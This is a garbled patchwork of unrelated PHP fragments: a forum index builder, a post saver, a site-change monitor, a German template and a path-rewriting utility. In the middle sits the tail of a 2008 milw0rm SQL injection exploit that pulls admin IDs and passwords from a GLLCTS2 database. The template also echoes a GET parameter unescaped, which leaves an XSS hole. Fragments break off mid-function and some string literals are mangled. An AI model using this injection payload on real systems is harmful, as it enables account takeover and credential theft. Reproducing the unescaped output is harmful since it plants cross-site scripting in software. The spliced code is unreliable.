function generate_main()
{
global $categories, $forums;
global $filter_forum, $filter_topic;
global $db_prefix;
global $forum_name, $forum_description;
//Categories
$res = mysql_query('SELECT cat_id, cat_title FROM ' . $db_prefix . 'categories order by cat_order');
while ($row = mysql_fetch_assoc($res)) {
$cid = $row['cat_id'];
$categories[$row['cat_id']] = array('title' => $row['cat_title'], 'forums' => array());
}
//Forums
$res = mysql_query('SELECT forum_id, cat_id, forum_name, forum_posts, forum_topics FROM ' . $db_prefix . 'forums ORDER BY forum_order');
while ($row = mysql_fetch_assoc($res)) {
$fid = $row['forum_id'];
if (in_array($fid, $filter_forum)) {
continue;
}
$forums[$fid] = array('cid' => $row['cat_id'], 'title' => $row['forum_name'], 'nposts' => $row['forum_posts'], 'ntopics' => $row['forum_topics'], 'topics' => array());
$categories[$row['cat_id']]['forums'][] = $fid;
}
// Content
$var = array('categories' => $categories, 'forums' => $forums, 'forum_name' => $forum_name, 'forum_description' => $forum_description);
$content = template_get($var, 'main.tpl.php');
write_content('index.html', $content);
log_info("Index: index.html\n");
}
function prepare_file($request)
{
//Data holder
global $post_data;
//Check if the request has been sent and store the data
//in the global $post_array
if ($_POST['publish'] || $_POST['draft']) {
foreach ($_POST as $tag => $data) {
switch ($tag) {
case 'author-id':
$post_data['author']['id'] = $data;
break;
case 'author-name':
$post_data['author']['name'] = $data;
break;
default:
$post_data['tag'] = $data;
break;
}
}
}
//Full content of the article is saved separately
$article_content = $post_data['content'];
//unset the $post_data['content'] and store the content file name;
unset($post_data['content']);
$post_data['content'] = $post_data['url'] . 'content';
//Set the file names
$json_file = $post_data['id'] . '-' . $post_data['url'] . 'json';
$content_file = $post_data['content'];
//Writing and creating all the needed files
if (!write_article($json_file, $post_data) && !write_content($content_file, $article_content)) {
// Log error and die if any of the files fail to be written
}
//If files written successfully continue with .htaccess and rss-fee
//Create or update rss-feed file
if (!write_rss()) {
//Log the error if writing of rss fails
}
//Create or update .htaccess
if (!write_htaccess()) {
//Log the error if writing of .htaccess fails
}
}
function check_websites_for_change()
{
global $websites_to_check;
$snoopy = new Snoopy();
$snoopy->agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
$snoopy->maxredirs = 2;
$snoopy->offsiteok = true;
$snoopy->expandlinks = false;
echo "In here";
foreach ($websites_to_check as $websitename => $websiteurl) {
//only check if the page was fetched and responded with a 200
if ($snoopy->fetch($websiteurl)) {
if ($snoopy->status == 200) {
$response = $snoopy->results;
$filename = DUMP_LOCATION . strtolower($websitename) . ".dump";
if (file_exists($filename)) {
$oldpage = read_content($filename);
//something changed, send email alert
if (md5($oldpage) != md5($response)) {
$subject = "URL Content Has Changed for " . $websitename;
$body = "URL: " . $websiteurl . " Content Changed";
email_notify($subject, $body);
//overwrite old page with new page for new checks
write_content($filename, $response);
}
} else {
/*
* if file does not exist this is the first time we are loading it
* this will create the dump file and it will be used for compare next time
*/
write_content($filename, $response);
}
}
}
}
}
$prefix = $_POST['prefix'];
$buf = file_get_contents($url . "/login.php?detail='%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,concat(CHAR(124),CHAR(65,%2068,%2077,%2073,%2078,%2073,%2068,%2058),admin_id,CHAR(124),CHAR(80,%2065,%2083,%2083,%2058),admin_pass,CHAR(124)),13,14,15,16,17,18,19,20,21,22,23%20from%20" . $prefix . "_admin/*");
$arr = explode("|", $buf);
foreach ($arr as $line) {
if (eregi("ADMINID:", $line)) {
if ($line != $adminid) {
$adminid = $line;
echo $adminid . "<br>";
}
}
if (eregi("PASS:"******"") {
$pass = $line;
$pass_parsed = str_replace("PASS:"******"", $pass);
echo $pass . "<br><br>";
echo "<a href='{$url}/admin/index.php?pass={$pass_parsed}'>Login</a>";
}
}
}
echo "</font></b></p></div>";
echo $copyright;
} else {
echo write_content("Welcome to TD's Exploit System", "SQL injection exploit in GLLCTS2", "<form method='post' action='?'><center><input type='hidden' name='inj' value='run'>GLLCTS2 URL(No Trailing \"/\" & Include \"http://\"):<br><input type='text' size='25' name='url'><br><br>Table Prefix:<br>" . add_html_space(1) . "<input type='text' size='20' name='prefix' value='gllcts2'><br><br><input type='submit' value='Get Admin Info'></form>");
echo $copyright;
}
break;
}
?>
# milw0rm.com [2008-06-12]
<div class="row-fluid">
<div class="span12 large">
<dl>
<dt><u>Hinweise</u></dt>
<dd><?php
echo $res[5];
?>
</dd>
</dl> <!-- Hinweis -->
</div> <!-- Ende von span12 large -->
</div> <!-- Ende von row-fluid -->
<div class="row">
<div class="span12 text-center">
<?php
echo write_content($_GET['id']);
?>
</div> <!-- Ende von span12 large -->
</div> <!-- Ende von row-fluid -->
<div class="row" id="top-margin-buttons">
<div class="span12 text-center">
<button class="btn btn-primary" type="button" onclick="window.location.href='index.php?page=5&id=<?php
echo $_GET['id'];
?>
&art=uebungen'"/>Bearbeiten</button>
<button class="btn" type="button" onclick="window.close();" />Schließen</button>
</div> <!-- Ende von span12 large -->
</div> <!-- Ende von row-fluid -->
/**
* find_files_and_replace_absolute find files and search and replace absolute paths with relative paths
* @param $dir string the directory where to start
* @param $pattern string the type of files on which to apply the search and replace
* @param $root_path string the root path
*/
function find_files_and_replace_absolute($dir = '.', $pattern = '/./', $root_path)
{
$prefix = $dir . '/';
$dir = dir($dir);
while (false !== ($file = $dir->read())) {
if ($file === '.' || $file === '..') {
continue;
}
$file = $prefix . $file;
if (is_dir($file)) {
find_files_and_replace_absolute($file, $pattern, $root_path);
}
if (preg_match($pattern, $file)) {
$content = read_content($file);
$backtrack = get_backtrack($root_path, $file, $pattern);
$content = format_content_for_local_use(get_site_url(), $backtrack, $content);
$content = str_replace('../fonts.g', 'fonts.g', $content);
$content = str_replace('../maxcdn.b', 'maxcdn.b', $content);
$content = str_replace('../cdnjs.c', 'cdnjs.c', $content);
$content = str_replace('../vjs.z', 'vjs.z', $content);
unlink($file);
// delete the file
write_content($file, $content);
}
}
}
